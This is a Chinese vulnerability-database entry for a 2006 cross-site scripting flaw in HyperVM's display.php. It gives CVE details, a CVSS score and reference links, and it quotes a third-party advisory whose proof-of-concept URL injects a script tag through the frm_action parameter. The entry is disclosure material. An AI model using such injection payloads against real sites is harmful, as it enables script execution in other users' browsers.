HyperVM 'display.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192412 漏洞类型 跨站脚本
发布时间 2006-12-19 更新时间 2006-12-19
CVE编号 CVE-2006-6649 CNNVD-ID CNNVD-200612-433
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/82168
https://cxsecurity.com/issue/WLB-2006120119
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-433
|漏洞详情
HyperVM1.2及之前版本的display.php存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助编码的frm_action参数注入任意Web脚本或HTML。
|漏洞EXP
#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#-----------------------------------------------------------
#Software: HyperVM
#Method: Cross-Site Scripting
#Vendor: http://hypervm.com
#
#PoC:
#
#victim::8888/display.php?frm_action=%22%3E%3Cscript%3Ealert('a')%3C/scr
ipt%3E
#
#Contact: Advisory (at) aria-security (dot) net [email concealed]
|受影响的产品
Hypervm Hypervm 1.2.2
|参考资料

来源:VIM
名称:20061219PossibleHyperVMvendordispute-butofseverityorexistence?
链接:http://www.attrition.org/pipermail/vim/2006-December/001191.html
来源:BUGTRAQ
名称:20061217HyperVMCross-SiteScripting
链接:http://www.securityfocus.com/archive/1/archive/1/454704/100/0/threaded
来源:VUPEN
名称:ADV-2006-5062
链接:http://www.frsirt.com/english/advisories/2006/5062
来源:MISC
链接:http://www.aria-security.com/forum/showthread.php?p=89#post89
来源:SECUNIA
名称:23413
链接:http://secunia.com/advisories/23413
来源:SREASON
名称:2051
链接:http://securityreason.com/securityalert/2051